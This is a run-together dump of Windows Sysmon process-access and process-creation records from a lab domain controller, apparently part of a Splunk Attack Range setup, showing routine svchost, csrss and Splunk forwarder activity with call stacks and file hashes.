13:13:15.677{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004382Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004381Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-436B-6000-F400-000000009A01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004380Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.677{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-436B-6000-F400-000000009A01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004379Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.678{08A6967A-436B-6000-F400-000000009A01}4264C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004378Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-436B-6000-F300-000000009A01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004377Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004376Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004375Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004374Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004373Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004372Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004371Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004370Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004369Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004368Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-436B-6000-F300-000000009A01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004367Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-436B-6000-F300-000000009A01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004366Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:15.005{08A6967A-436B-6000-F300-000000009A01}4120C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004405Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-436C-6000-F500-000000009A01}5040C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004404Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004403Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004402Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004401Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004400Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004399Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004398Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:13:16.350{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004397Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 